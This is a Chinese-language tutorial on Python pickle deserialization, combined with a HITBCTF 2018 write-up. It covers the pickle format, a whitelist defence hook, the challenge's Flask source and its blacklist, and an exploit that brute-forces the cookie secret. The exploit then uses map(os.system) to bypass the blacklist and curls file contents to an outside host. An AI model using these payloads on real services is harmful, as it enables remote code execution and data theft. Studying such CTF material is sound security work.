Pickle 反序列化漏洞
# Round-trip a plain string through cPickle (Python 2).
import cPickle
data = "test"
packed = cPickle.dumps(data) # serialize
data = cPickle.loads(packed) # deserialize
>>> packed
import pickle


class A(object):
    """Demo class that only has class-level attributes."""

    a = 'aaa'
    b = 2

    def __init__(self):
        """Print the class attributes; nothing is stored on the instance."""
        print("%s %s" % (self.a, self.b))


# Wrapping the pickle in a list makes print show its repr(), so the
# newlines inside the serialized string stay visible as "\n".
print([pickle.dumps(A())])
aaa 2
但我们发现序列化得到的字符串中并没有 A 类的 a、b 属性的值。这是因为 pickle 序列化保存的是实例(对象)自身的数据,而不是类属性。下面我们在构造函数中通过 self 给对象添加一个成员 c,再观察序列化结果:
class A(object):
    """Demo class with class-level attributes plus one instance attribute."""

    a = 'aaa'
    b = 2

    def __init__(self):
        """Store ``c`` on the instance, then print the class attributes."""
        # Only this instance attribute ends up in the pickled state.
        self.c = 'test'
        print("%s %s" % (self.a, self.b))


# Wrapping the pickle in a list makes print show its repr(), so the
# newlines inside the serialized string stay visible as "\n".
print([pickle.dumps(A())])
aaa 2
demo: 继承object类
class Test(object):
    """Demo class that inherits from ``object`` and has three instance attributes."""

    def __init__(self):
        """Populate the instance attributes that will be pickled."""
        self.a = 1
        self.b = '2'
        self.c = '3'


aa = Test()
bb = pickle.dumps(aa)
# Show the raw pickle (repr via the list) followed by the object rebuilt
# from it.
print("%s %s" % ([bb], pickle.loads(bb)))
["ccopy_reg\n_reconstructor\np0\n(c__main__\nTest\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nS'a'\np6\nI1\nsS'c'\np7\nS'3'\np8\nsS'b'\np9\nS'2'\np10\nsb."] <__main__.Test object at 0x7f2176f91610>
demo2 : 不继承object
class Test():
    """Demo class declared without inheriting from ``object``.

    The empty base list is deliberate: this snippet contrasts the pickle
    produced for such a class with the ``object``-derived variant.
    """

    def __init__(self):
        """Populate the instance attributes that will be pickled."""
        self.a = 1
        self.b = '2'
        self.c = '3'


aa = Test()
bb = pickle.dumps(aa)
# Show the raw pickle (repr via the list) followed by the object rebuilt
# from it.
print("%s %s" % ([bb], pickle.loads(bb)))
["(i__main__\nTest\np0\n(dp1\nS'a'\np2\nI1\nsS'c'\np3\nS'3'\np4\nsS'b'\np5\nS'2'\np6\nsb."] <__main__.Test instance at 0x7f83aa698ef0>
这一切都是因为 `__reduce__` 魔术方法:它在序列化时可以完全改变被序列化对象的表示(它返回的可调用对象及其参数会在反序列化时被调用)。这个方法相当强大,官方建议不要直接操作它,而是用更高级的接口 `__getnewargs__()`、`__getstate__()` 和 `__setstate__()` 等代替。
import os


class Test(object):
    """Demo of how ``__reduce__`` turns unpickling into a function call."""

    def __init__(self):
        """Set some instance attributes (ignored once ``__reduce__`` is defined)."""
        self.a = 1
        self.b = '2'
        self.c = '3'

    def __reduce__(self):
        """Return ``(callable, args)``; the unpickler calls ``callable(*args)``."""
        return (os.system, ('ls',))


aa = Test()
bb = pickle.dumps(aa)
# WARNING: pickle.loads() below runs `ls` through os.system. This is the
# reason untrusted data must never be unpickled.
print("%s %s" % ([bb], pickle.loads(bb)))
- 我就着 pickle 模块的源码看了一下,发现它是基于词法和语法分析(想想编译原理)来完成解析的:为每一个操作码字符都注册了相应的处理函数,逐个读取并分派处理,参数则按行读取(所以你会看到那么多 \n),最后在遇到 R(REDUCE)操作码时执行调用操作。
对于 pickle ,我觉得可以尝试去为Unpickler 添加一个自己写的装饰器,HOOK刚刚的 load_reduce 函数 ,用白名单的思想去解决。
#!/usr/bin/env python
# coding:utf-8
# author 9ian1i
# created at 2017.03.24
# a demo for filter unsafe callable object
from pickle import Unpickler as Unpkler
from pickle import *
# Prefer the C implementation of StringIO and fall back to the pure-Python
# one when it is unavailable (Python 2 module names).
try:
    from cStringIO import StringIO
except ImportError:
    from StringIO import StringIO
# Edit this whitelist to the callables you are willing to let a pickle invoke.
allow_list = [str, int, float, bytes, unicode]
class FilterException(Exception):
    """Raised when a pickle tries to call an object that is not whitelisted."""

    def __init__(self, value):
        """Build the error message from the rejected callable ``value``."""
        super(FilterException, self).__init__(
            'the callable object {value} is not allowed'.format(value=str(value)))
def _hook_call(func):
    """Decorator that checks the pending callable before a REDUCE handler runs.

    ``func`` is an Unpickler opcode handler, so the wrapper's first positional
    argument is the unpickler itself. The wrapper inspects ``stack[-2]`` of
    that unpickler and raises ``FilterException`` when it is not in
    ``allow_list``; otherwise it delegates to ``func`` unchanged.
    """
    def wrapper(*args, **kwargs):
        candidate = args[0].stack[-2]
        if candidate not in allow_list:
            # A custom error is raised here; replace with whatever handling
            # you prefer.
            raise FilterException(candidate)
        return func(*args, **kwargs)
    return wrapper
# Filtering replacements for pickle's two deserialization entry points.
def load(file):
    """Unpickle from the file-like object ``file`` with the REDUCE hook installed.

    Returns whatever the hooked unpickler produces; ``FilterException``
    propagates when the hook rejects a callable.
    """
    unpkler = Unpkler(file)
    # In Python 2's pure-Python pickle the dispatch table is a class-level
    # dict, so assigning into it through the instance would wrap the shared
    # handler once more on every call. Work on a per-instance copy instead.
    unpkler.dispatch = dict(Unpkler.dispatch)
    unpkler.dispatch[REDUCE] = _hook_call(Unpkler.dispatch[REDUCE])
    # Load with the hooked instance (the original built a second Unpickler
    # here and loaded with that one).
    # NOTE: only the REDUCE opcode is hooked by this function.
    return unpkler.load()
def loads(str):
    """Unpickle from the string ``str`` with the REDUCE hook installed.

    Returns whatever the hooked unpickler produces; ``FilterException``
    propagates when the hook rejects a callable.
    """
    file = StringIO(str)
    unpkler = Unpkler(file)
    # In Python 2's pure-Python pickle the dispatch table is a class-level
    # dict, so assigning into it through the instance would wrap the shared
    # handler once more on every call. Work on a per-instance copy instead.
    unpkler.dispatch = dict(Unpkler.dispatch)
    unpkler.dispatch[REDUCE] = _hook_call(Unpkler.dispatch[REDUCE])
    # NOTE: only the REDUCE opcode is hooked by this function.
    return unpkler.load()
def _filter_test():
    """Feed the filtering ``loads`` a pickle whose REDUCE target is ``eval``."""
    test_str = 'c__builtin__\neval\np0\n(S"os.system(\'net\')"\np1\ntp2\nRp3\n.'
    # NOTE(review): the statement that used test_str was missing from this
    # snippet; passing it to loads() is the assumed intent - confirm.
    loads(test_str)


if __name__ == '__main__':
    # NOTE(review): the guard had no body in this snippet; running the demo
    # is the assumed intent - confirm.
    _filter_test()
HITBCTF 2018 Python's revenge
from __future__ import unicode_literals
from flask import Flask, request, make_response, redirect, url_for, session
from flask import render_template, flash, redirect, url_for, request
from werkzeug.security import safe_str_cmp
from base64 import b64decode as b64d
from base64 import b64encode as b64e
from hashlib import sha256
from cStringIO import StringIO
import random
import string
import os
import sys
import subprocess
import commands
import pickle
import cPickle
import marshal
import os.path
import filecmp
import glob
import linecache
import shutil
import dircache
import io
import timeit
import popen2
import code
import codeop
import pty
import posixfile
SECRET_KEY = 'you will never guess'

# Create the cookie-signing secret on first start and persist it, so the
# read below returns the generated value rather than an empty file.
# SECURITY: the secret is only 4 characters drawn from letters and digits
# with the `random` module, so it can be brute-forced offline. Left as-is
# because this weakness is what the write-up exploits.
if not os.path.exists('.secret'):
    secret = ''.join(random.choice(string.ascii_letters + string.digits)
                     for _ in range(4))
    with open(".secret", "w") as f:
        f.write(secret)

with open(".secret", "r") as f:
    cookie_secret = f.read().strip()
# Flask application object for the reminder service.
app = Flask(__name__)
# Callables that the unpickling hook refuses: _hook_call raises
# FilterException when any entry of the unpickler stack is found in this list.
# Built-ins such as `map` are not listed here.
black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]
def count():
    """Reset the ``cnt`` counter stored in the session to zero."""
    # NOTE(review): no decorator is visible on this function in the snippet;
    # presumably it is registered to run before each request - confirm.
    session['cnt'] = 0
def home():
    """Render the index page with the location restored from the cookie.

    Redirects to the ``clear`` endpoint when ``getlocation()`` reports an
    invalid cookie.
    """
    # NOTE(review): no route decorator is visible for this view in the
    # snippet, although url_for('home') is used elsewhere - confirm.
    remembered_str = 'Hello, here\'s what we remember for you. And you can change, delete or extend it.'
    # new_str is assigned but never used in the visible code.
    new_str = 'Hello fellow zombie, have you found a tasty brain and want to remember where? Go right here and enter it:'
    location = getlocation()
    # getlocation() returns '' when there is no cookie and False when the
    # cookie is invalid; '' == False is not true, so only the invalid case
    # is redirected. Keep the equality test as written.
    if location == False:
        return redirect(url_for("clear"))
    return render_template('index.html', txt=remembered_str, location=location)
def clear():
    """Expire the ``location`` cookie and redirect back to ``home``."""
    # NOTE(review): no route decorator is visible for this view in the
    # snippet, although url_for("clear") is used elsewhere - confirm.
    print("Reminder cleared!")
    response = redirect(url_for('home'))
    # max_age=0 makes the browser drop the cookie immediately.
    response.set_cookie('location', max_age=0)
    return response
@app.route('/reminder', methods=['POST', 'GET'])
def reminder():
    """Store a new reminder in a signed cookie (POST) or show the form (GET).

    POST: pickles and base64-encodes the submitted ``reminder`` field, signs
    it with ``make_cookie`` and redirects to ``home`` with the cookie set.
    GET: validates the existing cookie via ``getlocation()`` and renders
    ``reminder.html``, or redirects to ``clear`` when the cookie is invalid.
    """
    if request.method == 'POST':
        location = request.form["reminder"]
        # NOTE(review): the two messages are mutually exclusive, so an
        # `else` branch is assumed here (the snippet had lost both its
        # indentation and this line) - confirm against the original source.
        if location == '':
            print("Message cleared, tell us when you have found more brains.")
        else:
            print("We will remember where you find your brains.")
        location = b64e(pickle.dumps(location))
        cookie = make_cookie(location, cookie_secret)
        response = redirect(url_for('home'))
        response.set_cookie('location', cookie)
        print('location')
        return response
    location = getlocation()
    # getlocation() returns False only for an invalid cookie ('' means "no
    # cookie"), so keep the equality test as written.
    if location == False:
        return redirect(url_for("clear"))
    return render_template('reminder.html')
class FilterException(Exception):
    """Raised when the unpickling hook finds a blacklisted callable."""

    def __init__(self, value):
        """Build the error message from the rejected object ``value``."""
        super(FilterException, self).__init__(
            'The callable object {value} is not allowed'.format(value=str(value)))
class TimesException(Exception):
    """Raised when the unpickling hook has been invoked too many times."""

    def __init__(self):
        """Initialise the exception with its fixed message."""
        super(TimesException, self).__init__(
            'Call func too many times!')
def _hook_call(func):
    """Wrap an Unpickler opcode handler with the blacklist and call-count checks.

    The wrapper's first positional argument is the unpickler. Each call
    increments ``session['cnt']``, raises ``FilterException`` when any entry
    of the unpickler stack is in ``black_type_list``, raises
    ``TimesException`` once the counter exceeds 4, and otherwise delegates
    to ``func``.
    """
    def wrapper(*args, **kwargs):
        session['cnt'] += 1
        print(session['cnt'])
        stack = args[0].stack
        print(stack)
        for item in stack:
            if item in black_type_list:
                # The message reports stack[-2], not the matching item.
                raise FilterException(stack[-2])
        # NOTE(review): indentation was lost in this snippet, so it is not
        # certain whether this check sat inside the loop above; it is
        # placed after the loop here - confirm against the original.
        if session['cnt'] > 4:
            raise TimesException()
        return func(*args, **kwargs)
    return wrapper
def loads(strs):
    """Unpickle ``strs`` with the REDUCE handler wrapped by ``_hook_call``.

    Returns the unpickled object; exceptions raised by the hook propagate
    to the caller.
    """
    files = StringIO(strs)
    unpkler = pickle.Unpickler(files)
    # Debug output. Joined as byte strings so an arbitrary payload prints
    # without any implicit text decoding.
    print(b" ".join((strs, str(files), str(unpkler))))
    # The argument of this call was missing in the snippet (unclosed
    # parenthesis); the existing REDUCE handler is what gets wrapped.
    unpkler.dispatch[pickle.REDUCE] = _hook_call(
        unpkler.dispatch[pickle.REDUCE])
    return unpkler.load()
def getlocation():
    """Return the reminder stored in the ``location`` cookie.

    Returns:
        ``''`` when the request has no ``location`` cookie, ``False`` when
        the cookie is malformed or its digest does not match, otherwise the
        object obtained by unpickling the base64-decoded payload.
    """
    cookie = request.cookies.get('location')
    if not cookie:
        return ''
    # A well-formed cookie is "<digest>!<payload>". Reject anything else as
    # invalid instead of failing on the tuple unpacking.
    parts = cookie.split("!")
    if len(parts) != 2:
        print("Hey! This is not a valid cookie! Leave me alone.")
        return False
    digest, location = parts
    expected = calc_digest(location, cookie_secret)
    print("%s %s" % ((digest, location), expected))
    if not safe_str_cmp(expected, digest):
        print("Hey! This is not a valid cookie! Leave me alone.")
        return False
    # SECURITY: the payload is client-supplied and is unpickled as soon as
    # the digest matches; anyone who learns cookie_secret can have the
    # server unpickle arbitrary data. Flagged, not changed.
    return loads(b64d(location))
def make_cookie(location, secret):
    """Return the cookie value ``"<digest>!<location>"`` for ``location``.

    The digest is ``calc_digest(location, secret)``.
    """
    return "%s!%s" % (calc_digest(location, secret), location)
def calc_digest(location, secret):
    """Return the hex SHA-256 digest of ``location`` followed by ``secret``."""
    payload = "%s%s" % (location, secret)
    # Hash bytes explicitly rather than relying on implicit text-to-bytes
    # conversion; for ASCII input the digest is unchanged.
    if not isinstance(payload, bytes):
        payload = payload.encode("utf-8")
    return sha256(payload).hexdigest()
if __name__ == '__main__':
    # Start the Flask development server on port 5051.
    app.run(host="", port=5051)
- 访问
生成 location,本地爆破 secret;再利用 map 函数绕过黑名单,实现任意命令执行
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from hashlib import sha256
import string
import cPickle
import pickle
from cStringIO import StringIO
import os
from base64 import b64decode as b64d
from base64 import b64encode as b64e
#return sha256("%s%s" % (location, secret)).hexdigest()
class Test(object):
    """Payload object whose pickle makes the unpickler call ``map(os.system, [...])``."""

    def __init__(self):
        """Set some instance attributes (ignored once ``__reduce__`` is defined)."""
        self.a = 1
        self.b = '2'
        self.c = '3'

    def __reduce__(self):
        """Return ``(map, (os.system, [command]))`` as the reduce value.

        The callable handed to the unpickler is ``map`` rather than
        ``os.system`` itself; ``os.system`` only appears inside the
        argument tuple.
        """
        return map, (os.system, ["curl h7x7ty.ceye.io/`cat /flag_is_here|base64`"])


aa = Test()
# Base64-encode the pickle; this becomes the payload part of the cookie.
payload = b64e(pickle.dumps(aa))
# Leftover debug output, disabled:
# print [bb]
# print [bb],pickle.loads(bb)
# Alphabet used for the 4-character secret search below.
sdic = string.ascii_letters + string.digits
# Alternative hard-coded payload, disabled:
#payload = "Y19fYnVpbHRpbl9fCm1hcApwMAooY3Bvc2l4CnN5c3RlbQpwMQoobHAyClMnd2dldCAxMjMuMjA2LjY1LjE2NzoyMDAwL2B3aG9hbWlgJwpwMwphdHA0ClJwNQou"
# Digest the search below compares against.
# NOTE(review): presumably taken from a cookie issued by the server - confirm.
old_digest = "f8a7e6ad4673e0ec405790e76934b7b0eb34d9b9a4c1eece0f9cb4d7ae71fff4"
# Brute-force search over every 4-character secret (disabled): hash
# payload + secret and compare with old_digest.
# for a in sdic:
#     for b in sdic:
#         for c in sdic:
#             for d in sdic:
#                 secret = a+b+c+d
#                 #print s
#                 digest = sha256(payload+secret).hexdigest()
#                 #print digest
#                 if digest == old_digest:
#                     print secret,digest
#                     break
# Print "<digest>!<payload>" cookie values signed with two hard-coded
# 4-character secrets.
print sha256(payload+"hitb").hexdigest()+'!'+payload
print sha256(payload+"LJIK").hexdigest()+'!'+payload
- Pickle反序列化知识之前没太深入了解,但通过看了很多资料最后还是成功做出了这题,CTF如果出现了你不了解的知识,可以先去看各种资料大概了解后再去做题,这才是CTF的魅力,也是CTFer需要掌握的本领
- 本地复现环境很重要。